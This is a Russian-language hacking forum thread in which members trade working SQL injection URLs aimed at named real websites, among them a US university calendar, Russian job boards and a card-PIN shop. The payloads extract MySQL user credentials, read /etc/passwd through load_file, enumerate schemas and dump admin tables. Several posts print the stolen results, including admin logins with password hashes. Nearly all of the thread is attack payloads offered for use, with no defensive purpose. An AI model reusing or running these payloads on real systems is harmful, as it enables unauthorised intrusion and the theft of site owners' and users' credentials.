SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. ENFIX

    ENFIX Elder - Старейшина

    Joined:
    6 Jun 2006
    Messages:
    175
    Likes Received:
    122
    Reputations:
    75
    University of Arkansas Pine Bluff =)
    Code:
    http://www.uapb.edu/calendar.php?method=EventDetail&Eid=-39+union+select+1,user(),3,4,version(),6,7/*
    Code:
    http://www.uapb.edu/calendar.php?method=EventDetail&Eid=-39+union+select+1,concat(user,0x3a,password),3,4,5,6,7+from+mysql.user/*
    Code:
    http://www.uapb.edu/calendar.php?method=EventDetail&Eid=-39+union+select+1,2,3,4,load_file(char(47,101,116,99,47,112,97,115,115,119,100)),6,7/*
    Code:
    http://www.uapb.edu/calendar.php?method=EventDetail&Eid=-39+union+select+1,2,3,4,load_file(char(47,101,116,99,47,104,111,115,116,115)),6,7/*
    Code:
    http://www.uapb.edu/calendar.php?method=EventDetail&Eid=-39+union+select+1,concat(AdminID,0x3a,AdminName,0x3a,AdminLoginName,0x3a,AdminPassword),3,4,5,6,7+from+admin/*
     
  2. Constantine

    Constantine Elder - Старейшина

    Joined:
    24 Nov 2006
    Messages:
    799
    Likes Received:
    710
    Reputations:
    301
    http://www.anycorp.com/log/log.php?id=-9+union+select+1,2,3,4/*
     
  3. 0nep@t0p

    0nep@t0p Elder - Старейшина

    Joined:
    25 May 2007
    Messages:
    134
    Likes Received:
    216
    Reputations:
    17
    http://zaki.ru/pagesnew.php?id=-1+union+select+1,2,3/*
    2 I-I()/Ib
    Sorry, лишний дописал
     
    #2683 0nep@t0p, 11 Jul 2007
    Last edited: 12 Jul 2007
  4. Dr.Z3r0

    Dr.Z3r0 Leaders of the World

    Joined:
    6 Jul 2007
    Messages:
    284
    Likes Received:
    594
    Reputations:
    567
    Шо за нах? Вообще то там три столбца.... То бишь вот так:
    http://zaki.ru/pagesnew.php?id=-1+union+select+1,2,3/*
     
  5. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    Code:
    http://www.vkks.ru/edit_ks.php?id=-1508%20union%20select%201,2,3,AES_DECRYPT(AES_ENCRYPT(concat(user,0x3a,password),1),1),5,6,7,8,9,10,11%20from%20mysql.user/*
     
    #2685 Scipio, 12 Jul 2007
    Last edited: 12 Jul 2007
  6. iRedX

    iRedX Elder - Старейшина

    Joined:
    18 Jun 2002
    Messages:
    117
    Likes Received:
    11
    Reputations:
    9
    http://www.zonewm.biz/showasf.php?id=4+union+select+1,mail,3,pass,5,6,7,8,9+from+user/*


    http://www.webmarket.mobi/wm.php?id=3+union+select+1,2,table_name,4,5,6+from+information_schema.tables/*

    http://www.webmarket.mobi/wm.php?id=3+union+select+1,p_user,pin_kod,4,ktype_karta,6+from+karty_pin/*
     
    1 person likes this.
  7. hitex

    hitex Member

    Joined:
    25 May 2007
    Messages:
    13
    Likes Received:
    11
    Reputations:
    0
    Code:
    http://www.rabota-chelyabinsk.info/agency.php?r=vac&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,concat_ws(0x203a20,email,pass),21,22,23,24,25,26,27,28,29+from+jobsmarket_spb.users
    урлы = бд
    PR от 1 до 5:

    Code:
    rabota-belgorod.info
    rabota-bryansk.info
    rabota-chelyabinsk.info
    rabota-chita.info
    rabota-ekaterenburg.info
    rabota-ekaterinburg.info
    rabota-irk.info	
    rabota-izhevsk.info
    rabota-kaluga.info
    rabota-kazan.info
    rabota-khabarovsk.info
    rabota-kirov.info
    rabota-kostroma.info
    rabota-krasnodar.info
    rabota-krasnoyarsk.info
    rabota-kursk.info
    rabota-lipetsk.info
    rabota-murmansk.info
    rabota-norilsk.info
    rabota-nsb.info
    rabota-nsk.info
    rabota-omsk.info
    rabota-orel.info
    rabota-orenburg.info
    rabota-penza.info
    rabota-perm.info
    rabota-pskov.info
    rabota-rostov.info
    rabota-ryazan.info
    rabota-samara.info
    rabota-saratov.info
    rabota-smolensk.info
    rabota-spb.info
    rabota-stavropol.info
    rabota-tambov.info
    rabota-tomsk.info
    rabota-tula.info
    rabota-tver.info
    rabota-tyumen.info
    rabota-ufa.info
    rabota-ulyanovsk.info
    rabota-volgograd.info
    rabota-voronezh.info
    rabota-yaroslavl.info
    rabota-yugra.info
     
    1 person likes this.
  8. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    Code:
    http://www.geenivaramu.ee/index.php?sub=-15%20union%20select%201,2,AES_DECRYPT(AES_ENCRYPT(concat(name,0x3a,pass),1),1),4,5%20from%20users%20limit%201,1/*
    там basic авторизация, первый пароль не подошел
     
  9. V.I.P

    V.I.P Elder - Старейшина

    Joined:
    6 Apr 2007
    Messages:
    69
    Likes Received:
    45
    Reputations:
    -6
    Ms-sql

    Сайт: www.doorsopendays.com

    inj: 1'+or+1=

    Версия: Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 1)

    Имя БД: doorsopendays

    Code:
    http://www.doorsopendays.com/communities.asp?id=1'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('comd_list','Buildings','Communities','dtproperties','Maps','sysconstraints','syssegments','cmd','D99_CMD','D99_REG','D99_Tmp','kill_kk'))--
     
  10. The_HuliGun

    The_HuliGun Elder - Старейшина

    Joined:
    19 May 2007
    Messages:
    191
    Likes Received:
    84
    Reputations:
    11
    www.wanna-be.tv
    9 юзеров
    Code:
    http://www.wanna-be.tv/items.php?item=99999999+union+select+1,id,3,username,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,password,38+from+users+limit+0,1/*
    
     
  11. V1p-eR

    V1p-eR Elder - Старейшина

    Joined:
    2 Jul 2007
    Messages:
    14
    Likes Received:
    15
    Reputations:
    0
    www.active-video.net
    Code:
    http://www.active-video.net/index.php?lang=rus&part=parts&id=14'+union+select+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10,11,12/*
    sitemaster@localhost:5.0.22:zerinru_cms

    Code:
    http://www.active-video.net/index.php?lang=rus&part=parts&id=14'+union+select+1,2,concat(table_schema,char(58),table_name),4,5,6,7,8,9,10,11,12+from+information_schema.columns+where+column_name=0x6c6f67696e+limit+0,1/*
    вытаскиваем таблицу с юзерами:zerinru_cms:users_mk

    Code:
    http://www.active-video.net/index.php?lang=rus&part=parts&id=14'+union+select+1,2,concat(table_schema,char(58),COLUMN_NAME),4,5,6,7,8,9,10,11,12+from+information_schema.columns+where+table_name='users_mk'+limit+0,1/*
    узнаем имена колонок:ID,Login,Password,Email,Status

    Code:
    http://www.active-video.net/index.php?lang=rus&part=parts&id=14'+union+select+1,2,concat_ws(0x3a,login,password,ID,Email),4,5,6,7,8,9,10,11,12+from+users_mk/*
    =))
    admin:8dc6eab8d5b075c7523797412cba4564:1:asd@asd.asd
    news:bd27bd83e6598a329eaee5c62a876726:2:asd@asd.asd
    user:e7c3218ac64594c02bc5c793f5c6b99a:3:none
     
    #2691 V1p-eR, 12 Jul 2007
    Last edited: 12 Jul 2007
    2 people like this.
  12. kair

    kair Elder - Старейшина

    Joined:
    12 Oct 2006
    Messages:
    146
    Likes Received:
    83
    Reputations:
    -4
    Code:
    http://www.leform.ru/design.php?id=430%20union%20select%201,name,id,4,5,6,7,8,9%20from%20designer/*
    джэс тур
    Code:
    http://www.bali-welcome.ru/hotel6.php?id=430%20union%20select%201,2,3,4,5,concat(user(),char(58),database()),7/*
     
    #2692 kair, 12 Jul 2007
    Last edited: 13 Jul 2007
    3 people like this.
  13. gemaglabin

    gemaglabin Green member

    Joined:
    1 Aug 2006
    Messages:
    773
    Likes Received:
    842
    Reputations:
    1,369
    Уруру - http://www.webfile.ru/files.php?search=gemaglabin')+and+1=0+union+select+1,2,3,4,table_name,6,7,8,9,10,11,12,13,14+From+INFORMATION_SCHEMA.TABLES+LIMIT+1,1/*
     
    5 people like this.
  14. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,390
    Likes Received:
    1,209
    Reputations:
    475
    Гема ужасно набоянил =)
    ///
     
    #2694 Spyder, 13 Jul 2007
    Last edited: 13 Jul 2007
  15. Geser

    Geser New Member

    Joined:
    13 Jul 2007
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Вопрос от новичка:
    тестирую www.ukazatel.ru/search.php
    инъекцию допускает, но ничего путного извлечь не мог, результаты запроса не сразу выводятся, а идут дальше в другой запрос. Это что значит, что инъекция тут невозможнп?
     
  16. hitex

    hitex Member

    Joined:
    25 May 2007
    Messages:
    13
    Likes Received:
    11
    Reputations:
    0
    Иркутский филиал СТК. 36 таблиц с паролями x_X

    Code:
    http://www.esir.ru/ru/contact/forum/s/p/?checkforums=1&checksubject=-1+union+select+1,2,3,4,5,concat_ws(0x203a20,user(),version(),database()),count(concat_ws(0x203a20,table_schema,table_name,column_name)),8,9,10,11,12,13,14,15+from+information_schema.columns+where+column_name="passwd"+or+column_name="password"+or+column_name="pass"
    Для красивого вывода можно было бы раскрутить _http://www.esir.ru/ru/contact/forum/s/?checkforums=-1+or+1=2 но чего-то не получилось =\
     
  17. iv.

    iv. Elder - Старейшина

    Joined:
    21 Mar 2007
    Messages:
    1,183
    Likes Received:
    438
    Reputations:
    107
    Четверка. Вывести ничего не получилось :(
     
  18. NOmeR1

    NOmeR1 Everybody lies

    Joined:
    2 Jun 2006
    Messages:
    1,068
    Likes Received:
    783
    Reputations:
    213
    Во как :) Четвёртая, перебирать лень :eek:
     
  19. NOmeR1

    NOmeR1 Everybody lies

    Joined:
    2 Jun 2006
    Messages:
    1,068
    Likes Received:
    783
    Reputations:
    213
    Хы... Первый раз вижу что бы всё было так запущено =\
     
    1 person likes this.
  20. iv.

    iv. Elder - Старейшина

    Joined:
    21 Mar 2007
    Messages:
    1,183
    Likes Received:
    438
    Reputations:
    107
    sibrabota.ru - Работа в Красноярске и Сибири
    version: 4.1.22-standard
    user: sibrabota@localhost
    database: sibrabota

    Не везет мне на четверки. :( Подбор таблиц закончился неудачно. Может быть у вас что выйдет.
     
Loading...
Thread Status:
Not open for further replies.